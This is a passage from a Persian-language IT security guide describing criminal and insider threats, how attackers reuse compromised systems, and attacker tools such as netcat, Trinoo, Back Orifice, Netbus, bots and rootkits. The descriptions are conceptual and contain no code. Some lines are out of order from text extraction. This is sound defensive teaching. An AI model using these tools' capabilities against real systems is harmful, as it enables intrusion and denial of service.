‫ﺭﻭﺯﺍﻧﻪ ﻣﻘﺎﺩﻳﺮ ﻫﻨﮕﻔﺘﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺍﺭﺯﺵ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺎﻟﻲ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭﺣﺎﻝ ﺗﺒﺎﺩﻝ ﺍﺳﺖ‪ .‬ﺧﻮﺵﺑﺎﻭﺭﺍﻧﻪ ﺍﺳﺖ ﻛﻪ ﺗﺼﻮﺭ ﺷﻮﺩ ﻋﻨﺎﺻـﺮ‬
‫ﺗﺒﻬﻜﺎﺭ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺧﺒﺮ ﻧﺪﺍﺭﻧﺪ‪ ،‬ﻳﺎ ﻋﻼﻗﻪﻣﻨﺪ ﻧﻴﺴﺘﻨﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺟﻬﺎﻥ ﺷـﺒﻜﻪﺷـﺪﻩ ﮔـﺴﺘﺮﺵ ﺩﻫﻨـﺪ‪ .‬ﺣﻤﻠـﻪﻫـﺎﻳﻲ ﺍﺯ ﻗﺒﻴـﻞ‬
‫ﻛﻼﻫﺒﺮﺩﺍﺭﻱ‪ ،‬ﺩﺯﺩﻱ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻭ ﭘﻮﻟﺸﻮﺋﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ‪ online‬ﻫﺪﺍﻳﺖ ﺷﺪﻩ ﺭﺥ ﺩﺍﺩﻩ ﺍﺳﺖ ﻛﻪ ﻣﻘﺎﻣـﺎﺕ ﻣـﺴﺌﻮﻝ ﻣﻌﺘﻘﺪﻧـﺪ ﻫﻤﮕـﻲ ﺩﺭ‬
‫ﺯﻣﺮﺓ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﻫﺴﺘﻨﺪ‪ .‬ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﻭﻱ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﮔﺴﺘﺮﺵ ﻭ ﻫﻤﺎﻫﻨﮕﻲ ﺧﻮﺩﻓﺮﻭﺷﻲﻫﺎ ﻭ ﻓﺤـﺸﺎ‪ ،‬ﻗﻤـﺎﺭ‪ ،‬ﺳـﻮﺩﺍﮔﺮﻱ ﺑـﺎ ﻣـﻮﺍﺩ‬
‫ﻻ ﻣﺸﻤﻮﻝ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﻣﻲﺷﻮﺩ‪ ،‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﻋـﻼﻭﻩ‬
‫ﻏﻴﺮﻗﺎﻧﻮﻧﻲ‪ ،‬ﻫﺠﻮﻡ ﻣﺴﻠﺤﺎﻧﻪ‪ ،‬ﻭ ﺳﺎﻳﺮ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺮ ﺁﻥ ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻮﺳﻂ ﻣﺠﺮﻣﻴﻦ ﺑﺮﺍﻱ ﻛﺸﻒ ﺁﻧﭽﻪ ﺩﻭﻟﺖ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺁﻧﻬﺎ ﻣﻲﺩﺍﻧـﺪ ﻳـﺎ ﻛـﺸﻒ ﻣﺸﺨـﺼﺎﺕ ﺧﺒـﺮ‬
‫ﺭﺳﺎﻧﺎﻥ ﻭ ﺷﻬﻮﺩ‪ ،‬ﻣﻮﺭﺩ ﻫﺪﻑ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫‪٢٦٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺑﺎ ﺟﻬﺎﻧﻲ ﺷﺪﻥ ﺷﺒﻜﻪ‪ ،‬ﺗﻬﺪﻳﺪﺍﺕ ﮔﺴﺘﺮﺓ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺍﻣﺮﻭﺯﻩ ﺩﻳﮕﺮ ﺑﺎﻧﺪ ﺩﺯﺩﺍﻥ ﺭﻭﺳﻲ‪ ،‬ﻣﺎﻓﻴﺎﺋﻲﻫﺎﻱ ﺳﻴـﺴﻴﻞ‪ ،‬ﻳـﺎﻛﻮﺯﺍﻱ ﮊﺍﭘـﻦ‪،‬‬
‫ﺗﺠﺎﺭ ﻣﻮﺍﺩ ﻣﺨﺪﺭ ﺩﺭ ﺁﻣﺮﻳﻜﺎﻱ ﺟﻨﻮﺑﻲ‪ ،‬ﻭ ﮔﺮﻭﻩ ﺍﺭﺍﺫﻝ ﻭ ﺍﻭﺑﺎﺵ ﻟﺲ ﺁﻧﺠﻠﺲ‪ ،‬ﻫﻤﻪ ﻭ ﻫﻤﻪ ﺭﻭﻱ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﺗﻨﻬﺎ ﭼﻨﺪ ﻛﻠﻴـﻚ ﻣـﺎﻭﺱ ﺍﺯ‬
‫ﻣﺎ ﻓﺎﺻﻠﻪ ﺩﺍﺭﻧﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻘﺎﻣﺎﺕ ﺩﺍﻳﺮﻩ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﺯ ﺍﻳﻨﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﻫﻪ ﺁﻳﻨﺪﻩ ﻣﺤﻞ ﺭﺷﺪ ﺟﺮﺍﺋﻢ ﺍﺳﺖ ﻧﮕﺮﺍﻧﻨﺪ‪.‬‬

‫ﻛﺎﺭﻣﻨﺪﺍﻥ ﻛﻼﺵ‬
‫ﻭ ﺑﺎﻻﺧﺮﻩ‪ ،‬ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎﻣﻬﺎﺭﺕ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻡ‪ ،‬ﻛﻴﻨﻪﺗﻮﺯﻱ‪ ،‬ﻳﺎ ﺍﺫﻳﺖ ﻭ ﺁﺯﺍﺭ‪ ،‬ﻋﻠﻴﻪ ﻛﺎﺭﻓﺮﻣﺎﻳﺎﻥ ﺧﻮﺩ ﺍﻗﺪﺍﻡ ﻛﺮﺩﻩﺍﻧـﺪ‪.‬‬
‫ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ‪ ،‬ﻛﺎﺭﻛﻨﺎﻥ ﺍﺧﺮﺍﺝ ﺷﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﻛﺎﺭﻓﺮﻣﺎﻳﺸﺎﻥ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﺟﺎ ﺩﺍﺩﻩﺍﻧﺪ‪.‬‬

‫ﻣﻬﺎﺟﻤﺎﻥ ﺑﺪﻧﺒﺎﻝ ﭼﻪ ﭼﻴﺰﻱ ﻫﺴﺘﻨﺪ‬


‫ﻻ ﭘﺎﻳﺎﻥ ﻛﺎﺭ ﻳﻚ ﻧﻔﻮﺫﮔﺮ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﮑﻪ ﺍﻏﻠﺐ ﻣﻬﺎﺟﻤﻴﻦ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺗﺤﺖ‬ ‫ﺻﺮﻑ ﺑﺪﺳﺖ ﮔﺮﻓﺘﻦ ﻛﻨﺘﺮﻝ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﻓﺮﻣﺎﻥ ﺧﻮﺩ ﺩﺭ ﺁﻭﺭﺩﻩﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﮔﺎﻡ ﻧﺨﺴﺖ ﺣﻤﻼﺕ ﻭ ﺧﺮﺍﺑﻜﺎﺭﻱﻫﺎﻱ ﺑﻌﺪﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﭘﺲ ﺍﺯ ﺁﻧﻜﻪ ﻣﻬﺎﺟﻢ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﺤﺖ‬
‫ﻓﺮﻣﺎﻥ ﺧﻮﺩ ﺩﺭ ﻣﻲﺁﻭﺭﺩ‪ ،‬ﺳﻴﺴﺘﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﺷﺮﺍﺭﺕﺑﺎﺭ ﻣﺨﺘﻠﻔﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺍﺯ ﺁﻥ ﺟﻤﻠﻪﺍﻧﺪ‪:‬‬
‫ﺷﺮﻭﻉ ﻛﺎﻭﺷﻬﺎ ﻳﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎ ﻋﻠﻴﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﮕﺮ؛‬ ‫•‬
‫ﺷﺮﻛﺖ ﺩﺍﺩﻥ ﺳﻴﺴﺘﻢ ﺩﺭ ﺣﻤﻼﺕ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ؛‬ ‫•‬
‫‪٣٩‬‬
‫ﻼ ﻣﻬﺎﺟﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﭘﻴﺎﻡ ﺍﺭﺗﺒﺎﻁ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﺪ ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﻭﻋﺪﻩﮔﺎﻫﻲ ﺑﺮﺍﻱ‬ ‫ﺍﺟﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻣﺨﻔﻲ )ﻣﺜ ﹰ‬ ‫•‬
‫ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﻭ ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﻛﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺩﺳﺘﺒﺮﺩ ﺯﺩﻩ ﺷﺪﻩ ﺭﺍ ﭘﺲ ﻣﻲﻓﺮﺳﺘﻨﺪ ﻋﻤﻞ ﻛﻨﺪ(؛‬
‫ﻛﻨﺘﺮﻝ ﻣﺨﻔﻴﺎﻧﺔ ﺷﺒﻜﺔ ﺳﺎﺯﻣﺎﻧﻲ ﻛﻪ ﻣﺎﻟﻚ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻩ ﺍﺳﺖ‪ ،‬ﺑﺎ ﻫﺪﻑ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻭﺭﺩﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻴﺸﺘﺮ؛ ﻭ‬ ‫•‬
‫ﺗﺒﺪﻳﻞ ﮐﺮﺩﻥ ﺁﻥ ﺑﻪ ﺍﻧﺒﺎﺭﻩﺍﻱ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﻬﺎﺟﻢ‪ ،‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺴﺮﻭﻗﻪ‪ ،‬ﻓﺤﺸﺎ‪ ،‬ﻳﺎ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺍﻃﻼﻋﺎﺕ ﻗﺎﭼﺎﻕ‪.‬‬ ‫•‬

‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻩ ﺗﺒﺪﻳﻞ ﺑﻪ ﺑﺴﺘﺮﻫﺎﻱ ﻋﺎﻟﻲ ﺑﺮﺍﻱ ﺍﻳﻨﮕﻮﻧﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺷﻮﺩ ﺩﻻﻳﻞ ﺯﻳﺎﺩﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﺍﮔﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻩ ﺑﺎ ﺳﺮﻋﺖ ﺑﺎﻻ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺻﻞ ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﺪ ﺧﺮﺍﺑﻲ ﻭ ﺍﺧﺘﻼﻝ ﺑﻴﺸﺘﺮﻱ ﻧﺴﺒﺖ ﺑـﻪ ﺳـﺎﻳﺮ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﻣﻬﺎﺟﻢ ﺑﺎﻋﺚ ﺷﻮﺩ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻩ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺩﺷﻮﺍﺭﺗﺮ ﻛﺮﺩﻥ ﻛـﺎﺭ ﻣـﺴﺌﻮﻟﻴﻦ ﺩﺭ‬
‫ﺭﺩﻳﺎﺑﻲ ﻛﺎﺭﻫﺎﻱ ﻣﻬﺎﺟﻢ ﺗﺎ ﺭﺳﻴﺪﻥ ﺑﻪ ﻣﻬﺎﺟﻢ ﻭﺍﻗﻌﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ .‬ﺍﮔﺮ ﻳﻚ ﻣﻬﺎﺟﻢ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺩﺭ ﺣﻮﺯﻩﻫـﺎﻱ‬
‫ﻣﺨﺘﻠﻔﻲ ﺑﺠﻬﺪ ‪ -‬ﻣﺜﻼﹰ‪ ،‬ﺍﺯ ﻳﻚ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﺗﺤﺖ ‪ Unix‬ﺩﺭ ﻓﺮﺍﻧﺴﻪ ﺗﺎ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ proxy‬ﻣﺒﺘﻨﻲ ﺑـﺮ ‪ windows‬ﺩﺭ ﻛـﺮﻩ‬
‫ﺟﻨﻮﺑﻲ‪ ،‬ﻭ ﺍﺯ ﻳﻚ ﻣﺮﻛﺰ ﺭﺍﻳﺎﻧﺔ ﺩﺍﻧﺸﮕﺎﻫﻲ ﺩﺭ ﻣﻜﺰﻳﻚ ﺗﺎ ﻳﻚ ﻣﺴﻴﺮﻳﺎﺏ ﺷﺎﻫﺮﺍﻩ‪ ٤٠‬ﺩﺭ ﻧﻴﻮﻳﻮﺭﻙ ‪ -‬ﻣﻤﻜﻦ ﺍﺳـﺖ ﻭﺍﻗﻌـﹰﺎ ﺭﺩﻳـﺎﺑﻲ ﻣﻌﻜـﻮﺱ‬
‫ﻣﻬﺎﺟﻢ ﺑﻪ ﺳﻤﺖ ﻣﺒﺪﺃ ﻏﻴﺮ ﻣﻤﻜﻦ ﺷﻮﺩ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﺕ ﻣﻬﺎﺟﻤﻴﻦ‬


‫ﻻ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﻴﻦ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﮔﻮﺷﻪﺍﻱ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬

‫‪(a.k.a netcat) nc‬‬


‫‪٤١‬‬
‫‪ netcat‬ﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺗﻮﺳﻂ ﻫﻮﺑﻴﺖ ﻧﻮﺷﺘﻪ ﺷﺪ‪ ،‬ﭼﺎﻗﻮﻱ ﺍﺭﺗﺶ ﺳﻮﺋﻴﺲ ﺑﺮﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺘﺒﻨﻲ ﺑﺮ ‪ IP‬ﺍﺳـﺖ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ‪ netcat‬ﻳـﻚ‬
‫ﺍﺑﺰﺍﺭ ﺑﺎ ﺍﺭﺯﺵ ﺭﺍﻫﺒﺮﻱ ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻔﻴﺪ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﻴﻦ ﻣﻲﺑﺎﺷﺪ‪ .‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ‪ netcat‬ﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﺩﺍﺩﺓ ﺩﻟﺨﻮﺍﻩ ﺑـﻪ ﭘﻮﺭﺗﻬـﺎﻱ ﺩﻟﺨـﻮﺍﻩ‬
‫‪ TCP/IP‬ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ﺑﺮﺍﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻣﺤﻠﻲ ‪ ،TCP/IP‬ﻭ ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﭘﻮﻳﺸﻬﺎﻱ ﻣﻘﺪﻣﺎﺗﻲ ﭘﻮﺭﺕ‪ ٤٢‬ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ‪.‬‬

‫‪39‬‬ ‫‪Internet Relay Chat Server‬‬


‫‪40‬‬ ‫‪Backbone Router‬‬
‫‪41‬‬ ‫‪Hobbit‬‬
‫‪42‬‬ ‫‪Basic Portscan‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٧٠‬‬

‫‪(a.k.a. Trinoo) Trinoo‬‬


‫‪ Trinoo‬ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺗﻬﺎﺟﻢ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻨﺘﻈﺮ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﭘﻴﺎﻡ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻩ ﺩﻭﺭ ﻣﻲﻣﺎﻧﺪ‪ ،‬ﻭ ﺑﺎ ﺩﺭﻳﺎﻓﺖ ﭘﻴـﺎﻡ ﻳـﻚ‬
‫ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺭﺍ ﻋﻠﻴﻪ ﻳﻚ ﺷﺨﺺ ﺛﺎﻟﺚ ﺷﺮﻭﻉ ﻣﻲﻛﻨﺪ‪ .‬ﻧﺴﺨﻪﻫﺎﻱ ‪ Trinoo‬ﺑﺮﺍﻱ ﺍﻏﻠـﺐ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ ‪ Unix‬ﺍﺯ ﺟﻤﻠـﻪ‬
‫ﻻ ﺑﺼﻮﺭﺕ ﻣﺨﻔﻴﺎﻧﻪ ﻣﻲﺑﺎﺷﺪ‪ .‬ﻳﻚ ﺗﺤﻠﻴﻞ ﻣـﺸﺮﻭﺡ ﺍﺯ ‪ Trinoo‬ﺩﺭ‬ ‫‪ Solaris‬ﻭ ‪ Red Hat Linux‬ﻣﻮﺟﻮﺩ ﺍﺳﺖ‪ .‬ﻭﺟﻮﺩ ‪ Trinoo‬ﻣﻌﻤﻮ ﹰ‬
‫ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‪:‬‬
‫‪http://staff.washington.edu/dittrich/misc/trinoo.analysis‬‬

‫‪ Back Orifice‬ﻭ ‪Netbus‬‬


‫ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ windows‬ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﻨﺪ ﺑﺮ ﺿﺮﺑﻪﻫﺎﻱ ﺻﻔﺤﻪ ﻛﻠﻴﺪ ﻧﻈـﺎﺭﺕ ﻛﻨﻨـﺪ‪،‬‬
‫ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ‪ upload‬ﻭ ‪ download‬ﻛﻨﻨﺪ‪ ،‬ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺭﺍ ﺭﻭﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺤﺖ ﻓﺮﻣـﺎﻥ ﺑـﻪ ﺍﺟـﺮﺍ‬
‫ﺩﺭﺁﻭﺭﻧﺪ‪.‬‬

‫‪Bot‬ﻫﺎ‬
‫ﻻ ﺑﻮﺳﻴﻠﻪ ﻳﻚ ﻣﻬﺎﺟﻢ ﺭﻭﻱ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﭘﺨـﺶﺷـﺪﻩ ﺩﺭ ﺷـﺒﻜﻪ‬ ‫‪Bot‬ﻫﺎ )ﻣﺨﻔﻒ ‪robot‬ﻫﺎ( ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﻮﭼﻜﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪Bot .‬ﻫﺎ ﻳﻜﻲ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻘﺪﻣﺎﺗﻲ ﺑﺮﺍﻱ ﻣﻬﺎﺭ ﻭ ﻫﺪﺍﻳﺖ ﺣﻤﻼﺕ ﺗﻮﺯﻳﻊﺷـﺪﺓ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﺭﻭﻱ ﻛﺎﻧﺎﻟﻬـﺎﻱ‬
‫ﺗﻘﻮﻳﺖ ﮔﻔﺘﮕﻮﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻲﺑﺎﺷﻨﺪ‪Bot .‬ﻫﺎ ﻣﻤﮑﻦ ﺍﺳﺖ ﺑﻮﺳﻴﻠﺔ ﻭﻳﺮﻭﺳﻬﺎ ﻭ ﻳﺎ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﺗﻮﺯﻳﻊ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻤﮑﻦ ﺍﺳﺖ ﺗـﺎ‬
‫ﺭﻭﺯﻫﺎ‪ ،‬ﻫﻔﺘﻪﻫﺎ‪ ،‬ﻭ ﻳﺎ ﻣﺎﻫﻬﺎ ﻏﻴﺮﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺑﮑﺎﺭ ﺑﻴﺎﻓﺘﻨﺪ‪ .‬ﺍﺯ ‪bot‬ﻫﺎ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﮐﺎﺭﻫﺎﻱ ﺧﻮﺩﮐﺎﺭ ﻧﻴﺰ ﺑﻬﺮﻩ ﺑﺮﺩ‪.‬‬

‫‪Rootkit‬ﻫﺎ‬
‫‪ rootkit‬ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺳﺖ ﻛﻪ ﻫﻤﺰﻣﺎﻥ ﺑﻪ ﻣﻬﺎﺟﻢ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻛﺎﺭﺑﺮ ﺳﻄﺢ ﺑﺎﻻ ﺭﺍ ﺩﺭ ﻳﻚ ﺭﺍﻳﺎﻧـﻪ ﻣـﻲﺩﻫـﺪ‪،‬‬
‫ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﺭﺍ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻛﺎﺭ ﻣﻲﮔﺬﺍﺭﺩ‪ ،‬ﻭ ﻫﺮ ﺭﺩﭘﺎﻳﻲ ﺍﺯ ﺣﻀﻮﺭ ﻣﻬﺎﺟﻢ ﺭﺍ ﭘﺎﻙ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭ ﺍﺑﺘﺪﺍ ‪rootkit‬ﻫﺎ ﺑﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪Unix‬‬
‫ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩﻧﺪ )ﻭ ﻧﺎﻡ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ‪ root‬ﻧﻴﺰ ﺍﺯ ﻫﻤﻴﻨﺠﺎ ﺁﻣـﺪﻩ(‪ ،‬ﻭﻟﻲ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ windows‬ﻫﻢ ﺗﻮﻟﻴـﺪ ﺷـﺪﻩﺍﻧـﺪ‪ .‬ﻳـﻚ ‪rootkit‬‬
‫ﻧﻮﻋﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻛﺎﺭﺑﺮ ﺳﻄﺢ ﺑﺎﻻ ﺗﻼﺷﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ .‬ﻫﻤﻴﻨﻜﻪ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺑﺮ ﺳـﻄﺢ ﺑـﺎﻻ‬
‫ﺑﺪﺳﺖ ﺁﻣﺪ‪ rootkit ،‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻐﻴﻴﺮ ﺩﻫﺪ ﻛﻪ ﻳﻚ ﺩﺭﺏ ﻣﺨﻔﻲ ﺑﻪ ﺁﻥ ﺍﺿﺎﻓﻪ ﺷﻮﺩ‪ .‬ﺁﻧﮕﺎﻩ ﻫﺴﺘﺔ ﺍﺻﻠﻲ‬
‫ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﺪ ﻛﻪ ﻫﺮ ﺗﻼﺵ ﺑﺮﺍﻱ ﺧﻮﺍﻧﺪﻥ ﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ‪ ،‬ﺑﺠﺎﻱ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻠﻲ ﻣﻘﺪﺍﺭ ﺗﻐﻴﻴﺮﻳﺎﻓﺘﻪ ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ؛ ﻓﺮﺍﻣﻴﻦ‬
